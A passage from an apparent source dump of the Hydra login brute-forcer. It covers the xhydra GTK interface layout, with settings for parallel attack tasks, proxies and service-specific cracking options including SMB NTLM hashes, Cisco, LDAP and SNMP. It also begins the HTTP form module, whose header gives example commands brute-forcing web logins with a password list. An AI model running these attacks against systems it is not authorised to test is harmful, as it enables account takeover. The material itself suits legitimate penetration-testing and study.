\n\t\t\t\n\t\t\t True\n\t\t\t The user name for proxy authentication\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t yourname\n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 3\n\t\t\t 4\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Password\n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 4\n\t\t\t 5\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The password for proxy authentication\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t yourpass\n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 4\n\t\t\t 5\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t \n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 2\n\t\t\t 3\n\t\t\t fill\n\t\t\t \n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t False\n\t\t\t 0\n\n\t\t\t \n\t\t\t \n\t\t\t True\n\t\t\t True\n\t\t\t No Proxy\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t True\n\t\t\t False\n\t\t\t True\n\t\t\t \n\t\t\t \n\t\t\t 0\n\t\t\t True\n\t\t\t True\n\t\t\t \n\t\t\t \n\n\t\t\t \n\t\t\t \n\t\t\t True\n\t\t\t Enable this to use a proxy for scanning ( Only for HTTP Module )\n\t\t\t True\n\t\t\t HTTP Method\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t radioProxy\n\t\t\t \n\t\t\t \n\t\t\t 0\n\t\t\t True\n\t\t\t True\n\t\t\t \n\t\t\t \n\n\t\t\t \n\t\t\t \n\t\t\t True\n\t\t\t Enable this to use a proxy for scanning\n\t\t\t True\n\t\t\t CONNECT Method\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t radioProxy\n\t\t\t \n\t\t\t \n\t\t\t 0\n\t\t\t True\n\t\t\t True\n\t\t\t \n\t\t\t \n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink|fill\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Use a HTTP/HTTPS Proxy\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t 1\n\t\t 1\n\t\t 2\n\t\t expand|shrink|fill\n\t\t expand|shrink|fill\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 3\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Enable this to stop all attacking processes once a valid login/password pair is found\n\t\t\t True\n\t\t\t Exit after first found pair\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 2\n\t\t\t 2\n\t\t\t 3\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The maximum timeout an attack process is waiting for a response from the target\n\t\t\t True\n\t\t\t 1\n\t\t\t 0\n\t\t\t False\n\t\t\t GTK_UPDATE_ALWAYS\n\t\t\t False\n\t\t\t False\n\t\t\t 30 0 100 1 10 10\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t The number of attack tasks to run in parallel. The more the faster, the most: computer lockup :-) 16-64 is a good choice\n\t\t\t True\n\t\t\t 1\n\t\t\t 0\n\t\t\t False\n\t\t\t GTK_UPDATE_ALWAYS\n\t\t\t False\n\t\t\t False\n\t\t\t 40 0 100 1 10 10\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Timeout\n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Number of Tasks\n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Performance Options\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t 1\n\t\t 0\n\t\t 1\n\t\t fill\n\t\t\n\t \n\t \n\t \n\t False\n\t True\n\t \n\t \n\n\t \n\t \n\t True\n\t Tuning\n\t False\n\t False\n\t GTK_JUSTIFY_LEFT\n\t False\n\t False\n\t 0.5\n\t 0.5\n\t 0\n\t 0\n\t \n\t \n\t tab\n\t \n\t \n\n\t \n\t \n\t True\n\t False\n\t 0\n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t URL to connect to via the proxy\n\t\t True\n\t\t True\n\t\t True\n\t\t 0\n\t\t www.suse.com\n\t\t True\n\t\t *\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t http-proxy module\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t The protected URL you want to access\n\t\t True\n\t\t True\n\t\t True\n\t\t 0\n\t\t /foo/bar/protected.html\n\t\t True\n\t\t *\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t http / https url\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t The password to the cisco device\n\t\t True\n\t\t True\n\t\t True\n\t\t 0\n\t\t password\n\t\t True\n\t\t *\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Cisco Enable, Login for Cisco device\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t The DN scope of ldap to authenticate against\n\t\t True\n\t\t True\n\t\t True\n\t\t 0\n\t\t dn-scope\n\t\t True\n\t\t *\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t LDAP DN\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t False\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Just attack local accounts\n\t\t\t True\n\t\t\t local accounts\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t True\n\t\t\t True\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Attack domain and local accounts\n\t\t\t True\n\t\t\t domain accounts\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t True\n\t\t\t True\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Interpret passes as NTML hashes\n\t\t\t True\n\t\t\t Interpret passes as NTLM hashes\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t False\n\t\t\t False\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t SMBNT\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t The client id you want to attack, something between 0 and 99\n\t\t True\n\t\t 1\n\t\t 0\n\t\t False\n\t\t GTK_UPDATE_ALWAYS\n\t\t False\n\t\t False\n\t\t 1 0 99 1 10 10\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t sapr3 client id\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t Directory of the CVS repository\n\t\t True\n\t\t True\n\t\t True\n\t\t 0\n\t\t /hydra-gtk\n\t\t True\n\t\t *\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t CVS/SVN Repository\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 0.5\n\t\t 0.5\n\t\t 1\n\t\t 1\n\t\t 0\n\t\t 0\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t Insert the return string for a successful login\n\t\t\t True\n\t\t\t True\n\t\t\t True\n\t\t\t 0\n\t\t\t \n\t\t\t True\n\t\t\t *\n\t\t\t False\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t Telnet - Successful Login String\n\t\t False\n\t\t True\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t 0\n\t\t 0.5\n\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t \n\t\t \n\t\t True\n\t\t 2\n\t\t 2\n\t\t False\n\t\t 0\n\t\t 0\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Write Password\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Read Password\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t radioSNMPRead\n\t\t\t\n\t\t\t\n\t\t\t 1\n\t\t\t 2\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Version 2\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 1\n\t\t\t 2\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t True\n\t\t\t Version 1\n\t\t\t True\n\t\t\t GTK_RELIEF_NORMAL\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t radioSNMPVer2\n\t\t\t\n\t\t\t\n\t\t\t 0\n\t\t\t 1\n\t\t\t 0\n\t\t\t 1\n\t\t\t expand|shrink\n\t\t\t expand\n\t\t\t\n\t\t \n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t SNMP\n\t\t False\n\t\t False\n\t\t GTK_JUSTIFY_LEFT\n\t\t False\n\t\t False\n\t\t 0.5\n\t\t 0.5\n\t\t 0\n\t\t 0\n\t\t \n\t\t \n\t\t label_item\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\t \n\t \n\t False\n\t True\n\t \n\t \n\n\t \n\t \n\t True\n\t Specific\n\t False\n\t False\n\t GTK_JUSTIFY_LEFT\n\t False\n\t False\n\t 0.5\n\t 0.5\n\t 0\n\t 0\n\t \n\t \n\t tab\n\t \n\t \n\n\t \n\t \n\t True\n\t False\n\t 0\n\n\t \n\t\t\n\t\t True\n\t\t True\n\t\t GTK_POLICY_AUTOMATIC\n\t\t GTK_POLICY_AUTOMATIC\n\t\t GTK_SHADOW_NONE\n\t\t GTK_CORNER_TOP_LEFT\n\n\t\t \n\t\t \n\t\t True\n\t\t GTK_SHADOW_IN\n\n\t\t \n\t\t\t\n\t\t\t True\n\t\t\t 0\n\t\t\t 0.5\n\t\t\t GTK_SHADOW_ETCHED_IN\n\n\t\t\t \n\t\t\t \n\t\t\t True\n\t\t\t True\n\t\t\t False\n\t\t\t False\n\t\t\t True\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t GTK_WRAP_NONE\n\t\t\t True\n\t\t\t 0\n\t\t\t 0\n\t\t\t 0\n\t\t\t 0\n\t\t\t 0\n\t\t\t 0\n\t\t\t \n\t\t\t \n\t\t\t \n\n\t\t\t \n\t\t\t \n\t\t\t True\n\t\t\t Output\n\t\t\t False\n\t\t\t False\n\t\t\t GTK_JUSTIFY_LEFT\n\t\t\t False\n\t\t\t False\n\t\t\t 0.5\n\t\t\t 0.5\n\t\t\t 0\n\t\t\t 0\n\t\t\t \n\t\t\t \n\t\t\t label_item\n\t\t\t \n\t\t\t \n\t\t\t\n\t\t \n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t True\n\t\t True\n\t\t\n\t \n\n\t \n\t\t\n\t\t True\n\t\t False\n\t\t 0\n\n\t\t \n\t\t \n\t\t True\n\t\t start hydra\n\t\t True\n\t\t Start\n\t\t True\n\t\t GTK_RELIEF_NORMAL\n\t\t True\n\t\t \n\t\t \n\t\t \n\t\t 0\n\t\t True\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t stop hydra\n\t\t True\n\t\t Stop\n\t\t True\n\t\t GTK_RELIEF_NORMAL\n\t\t True\n\t\t \n\t\t \n\t\t \n\t\t 0\n\t\t True\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t save output\n\t\t True\n\t\t Save Output\n\t\t True\n\t\t GTK_RELIEF_NORMAL\n\t\t True\n\t\t \n\t\t \n\t\t \n\t\t 0\n\t\t True\n\t\t False\n\t\t \n\t\t \n\n\t\t \n\t\t \n\t\t True\n\t\t clear screen\n\t\t True\n\t\t Clear Output\n\t\t True\n\t\t GTK_RELIEF_NORMAL\n\t\t True\n\t\t \n\t\t \n\t\t \n\t\t 0\n\t\t True\n\t\t False\n\t\t \n\t\t \n\t\t\n\t\t\n\t\t 0\n\t\t False\n\t\t True\n\t\t\n\t \n\t \n\t \n\t False\n\t True\n\t \n\t \n\n\t \n\t \n\t True\n\t Start\n\t False\n\t False\n\t GTK_JUSTIFY_LEFT\n\t False\n\t False\n\t 0.5\n\t 0.5\n\t 0\n\t 0\n\t \n\t \n\t tab\n\t \n\t \n\t\n\t\n\t 0\n\t True\n\t True\n\t\n \n\n \n\t\n\t True\n\t True\n\t\n\t\n\t 0\n\t False\n\t False\n\t\n \n \n \n\n\n\n" }, { "path": "hydra-gtk/xhydra.gladep", "content": " \n\n\n\n Hydra_gtk\n xhydra\n FALSE\n FALSE\n TRUE\n\n" }, { "path": "hydra-http-form.c", "content": "/*\n\nHydra Form Module\n-----------------\n\nThe hydra form can be used to carry out a brute-force attack on simple\nweb-based login forms that require username and password variables via\neither a GET or POST request.\n\nThe module works similarly to the HTTP basic auth module and will honour\nproxy mode (with authenticaion) as well as SSL. The module can be invoked\nwith the service names of \"http-get-form\", \"http-post-form\",\n\"https-get-form\" and \"https-post-form\".\n\nHere's a couple of examples: -\n\n./hydra -l \"\" -P pass.txt 10.221.64.12 http-post-form\n\"/irmlab2/testsso-auth.do:ID=^USER^&Password=^PASS^:Invalid Password\"\n\n./hydra -S -s 443 -l \"\" -P pass.txt 10.221.64.2 https-get-form\n\"/irmlab1/vulnapp.php:username=^USER^&pass=^PASS^:incorrect\"\n\nThe option field (following the service field) takes \":\" separated values:\nThe first is the page on the server to GET or POST to.\nThe second is the POST/GET variables (taken from either the browser, or a proxy\nsuch as ZAP) with the varying usernames and passwords in the \"^USER^\" and\n\"^PASS^\" placeholders.\nThe third + are optional parameters like C=, H= etc. (see below)\nThe final(!) parameter is the string that it checks for an *invalid* or *valid*\nlogin\nSo please:\n * invalid condition login should be preceded by \"F=\"\n * valid condition login should be preceded by \"S=\".\nBy default, if no header is found the condition is assume to be a fail (F=),\nso checking for an *invalid* login string.\n\nIf you specify the debug flag (-d) it will show you the response from the\nHTTP server which is useful for checking the result of a failed login to\nfind something to pattern match against. This should be done together with -t 1.\n\n*/\n\n#include \"hydra-http.h\"\n#include \"sasl.h\"\n\nextern char *HYDRA_EXIT;\nchar *buf;\nchar *cond;\nextern int32_t http_auth_mechanism;\n\nstruct header_node {\n char *header;\n char *value;\n char type;\n struct header_node *next;\n};\n\ntypedef struct cookie_node {\n char *name;\n char *value;\n struct cookie_node *prev;\n struct cookie_node *next;\n} t_cookie_node, *ptr_cookie_node;\n\nint32_t success_cond = 0;\nint32_t getcookie = 1;\nint32_t auth_flag = 0;\nint32_t code_302_is_success = 0;\nint32_t code_401_is_failure = 0;\nint32_t multipart_mode = 0;\n\nchar cookie[4096] = \"\", cmiscptr[1024];\n\nint32_t webport;\nchar bufferurl[6096 + 24], cookieurl[6096 + 24] = \"\", userheader[6096 + 24] = \"\", *url, *variables, *optional1;\n\n#define MAX_REDIRECT 8\n#define MAX_CONTENT_LENGTH 20\n#define MAX_PROXY_LENGTH 2048 // sizeof(cookieurl) * 2\n\nchar redirected_url_buff[2048] = \"\";\nint32_t redirected_flag = 0;\nint32_t redirected_cpt = MAX_REDIRECT;\nint32_t uses_random_ip = 0;\n\nchar *cookie_request = NULL, *normal_request = NULL; // Buffers for HTTP headers\n\n/*\n * Function to perform some initial setup.\n */\nptr_header_node initialize(char *ip, unsigned char options, char *miscptr);\n\n/*\n * Returns 1 if specified header exists, or 0 otherwise.\n */\nptr_header_node header_exists(ptr_header_node *ptr_head, char *header_name, char type) {\n ptr_header_node cur_ptr = *ptr_head, found_header = NULL;\n\n for (cur_ptr = *ptr_head; cur_ptr && !found_header; cur_ptr = cur_ptr->next)\n if (cur_ptr->header && strcmp(cur_ptr->header, header_name) == 0 && cur_ptr->type == type)\n found_header = cur_ptr;\n\n return found_header;\n}\n\n#if defined(__sun)\n\n/* Written by Kaveh R. Ghazi */\nchar *strndup(const char *s, size_t n) {\n char *result;\n size_t len = strlen(s);\n\n if (n < len)\n len = n;\n\n result = (char *)malloc(len + 1);\n if (!result)\n return 0;\n\n memcpy(result, s, len);\n result[len] = '\\0';\n return (result);\n}\n#endif\n\nint32_t append_cookie(char *name, char *value, ptr_cookie_node *last_cookie) {\n ptr_cookie_node new_ptr = (ptr_cookie_node)malloc(sizeof(t_cookie_node));\n\n if (!new_ptr)\n return 0;\n new_ptr->name = name;\n new_ptr->value = value;\n new_ptr->next = NULL;\n new_ptr->prev = NULL;\n\n if (*last_cookie == NULL)\n *last_cookie = new_ptr;\n else\n (*last_cookie)->next = new_ptr;\n\n return 1;\n}\n\nchar *stringify_cookies(ptr_cookie_node ptr_cookie) {\n ptr_cookie_node cur_ptr = NULL;\n uint32_t length = 1;\n char *cookie_hdr = (char *)malloc(length);\n\n if (cookie_hdr) {\n memset(cookie_hdr, 0, length);\n for (cur_ptr = ptr_cookie; cur_ptr; cur_ptr = cur_ptr->next) {\n length += 2 + strlen(cur_ptr->name) + strlen(cur_ptr->value);\n cookie_hdr = (char *)realloc(cookie_hdr, length);\n if (cookie_hdr) {\n strcat(cookie_hdr, cur_ptr->name);\n strcat(cookie_hdr, \"=\");\n strcat(cookie_hdr, cur_ptr->value);\n if (cur_ptr->next)\n strcat(cookie_hdr, \";\");\n } else\n goto bail;\n }\n goto success;\n }\n\nbail:\n if (cookie_hdr) {\n free(cookie_hdr);\n cookie_hdr = NULL;\n }\n\nsuccess:\n return cookie_hdr;\n}\n\n/*\n * Cookie list layout:\n * \t+----------+ +--------+ +------+\n * \t| ptr_head | --> | next | --> | NULL |\n * \t+----------+ | header | +------+\n * \t | value |\n * \t +--------+\n * Returns 1 if success, or 0 otherwise.\n */\nint32_t add_or_update_cookie(ptr_cookie_node *ptr_cookie, char *cookie_expr) {\n ptr_cookie_node cur_ptr = NULL;\n char *cookie_name = NULL, *cookie_value = strstr(cookie_expr, \"=\");\n\n if (cookie_value) {\n cookie_name = strndup(cookie_expr, cookie_value - cookie_expr);\n cookie_value = strdup(cookie_value + 1);\n\n // we've got the cookie's name and value, now it's time to insert or update\n // the list\n if (*ptr_cookie == NULL) {\n // no cookies\n append_cookie(cookie_name, cookie_value, ptr_cookie);\n } else {\n for (cur_ptr = *ptr_cookie; cur_ptr; cur_ptr = cur_ptr->next) {\n if (strcmp(cur_ptr->name, cookie_name) == 0) {\n free(cur_ptr->value); // free old value\n free(cookie_name); // we already have it\n cur_ptr->value = cookie_value;\n break;\n }\n if (cur_ptr->next == NULL) {\n append_cookie(cookie_name, cookie_value, &cur_ptr);\n break;\n }\n }\n }\n } else\n return 0;\n return 1;\n}\n\nint32_t process_cookies(ptr_cookie_node *ptr_cookie, char *cookie_expr) {\n char *tok = NULL;\n char *expr = strdup(cookie_expr);\n int32_t res = 0;\n\n if (strstr(cookie_expr, \";\")) {\n tok = strtok(expr, \";\");\n while (tok) {\n res = add_or_update_cookie(ptr_cookie, tok);\n if (!res) {\n free(expr);\n return res;\n }\n tok = strtok(NULL, \";\");\n }\n free(expr);\n return res;\n } else {\n add_or_update_cookie(ptr_cookie, expr);\n free(expr);\n return 0;\n }\n}\n\n/*\n * List layout:\n * \t+----------+ +--------+ +--------+ +--------+\n * \t| ptr_head | --> | next | --> | next | --> | NULL |\n * \t| | | header | | header | | NULL |\n * \t| | | value | | value | | NULL |\n * \t+----------+ +--------+ +--------+ +--------+\n *\n * \tReturns 1 if success, or 0 otherwise (out of memory).\n */\nint32_t add_header(ptr_header_node *ptr_head, char *header, char *value, char type) {\n ptr_header_node cur_ptr = NULL;\n ptr_header_node existing_hdr, new_ptr;\n\n if (!header || !value || !strlen(header) || !strlen(value))\n return 0;\n\n // get to the last header\n for (cur_ptr = *ptr_head; cur_ptr && cur_ptr->next; cur_ptr = cur_ptr->next)\n ;\n\n char *new_header = strdup(header);\n char *new_value = strdup(value);\n\n if (new_header && new_value) {\n if ((type == HEADER_TYPE_USERHEADER) || (type == HEADER_TYPE_DEFAULT && !header_exists(ptr_head, new_header, HEADER_TYPE_USERHEADER_REPL)) || (type == HEADER_TYPE_USERHEADER_REPL && !header_exists(ptr_head, new_header, HEADER_TYPE_DEFAULT)) || (type == HEADER_TYPE_DEFAULT_REPL && !header_exists(ptr_head, new_header, HEADER_TYPE_DEFAULT))) {\n /*\n * We are in one of the following scenarios:\n * 1. A default header with no user-supplied headers that replace it.\n * 2. A user-supplied header that must be appended (option 'h').\n * 3. A user-supplied header that must replace a default header\n * (option 'h'), but no default headers exist with that name.\n *\n * In either case we just add the header to the list.\n */\n new_ptr = (ptr_header_node)malloc(sizeof(t_header_node));\n if (!new_ptr) {\n free(new_header);\n free(new_value);\n return 0;\n }\n new_ptr->header = new_header;\n new_ptr->value = new_value;\n new_ptr->type = type;\n new_ptr->next = NULL;\n\n if (cur_ptr)\n cur_ptr->next = new_ptr;\n else {\n // head is NULL, so the list is empty\n *ptr_head = new_ptr;\n }\n } else if ((type == HEADER_TYPE_DEFAULT_REPL || type == HEADER_TYPE_USERHEADER_REPL) && (existing_hdr = header_exists(ptr_head, new_header, HEADER_TYPE_DEFAULT)) != NULL) {\n // It's a user-supplied header that must replace a default one\n // Replace the default header's value with this new value\n free(existing_hdr->value); // free old value\n existing_hdr->value = new_value;\n existing_hdr->type = type;\n free(new_header); // we dont need this one anymore\n }\n } else {\n // we're out of memory, so forcefully end\n free(new_header);\n free(new_value);\n return 0;\n }\n\n return 1;\n}\n\n/*\n * Skip 0.0.0.0/8\n * Skip 127.0.0.0/8 (loopback)\n * Skip 224.0.0.0/4 (multicast)\n * Skip 240.0.0.0/4 (reserved)\n */\nchar *generate_random_ip() {\n static char ip_str[16]; // xxx.xxx.xxx.xxx\\0 = 16 chars\n static int32_t initialized = 0;\n if (!initialized) {\n srand(time(NULL) ^ getpid());\n initialized = 1;\n }\n unsigned char octet1, octet2, octet3, octet4;\n do {\n octet1 = (unsigned char)(rand() % 256);\n } while (octet1 == 0 || octet1 == 127 || octet1 >= 224);\n octet2 = (unsigned char)(rand() % 256);\n octet3 = (unsigned char)(rand() % 256);\n octet4 = (unsigned char)(rand() % 256);\n snprintf(ip_str, sizeof(ip_str), \"%u.%u.%u.%u\", octet1, octet2, octet3, 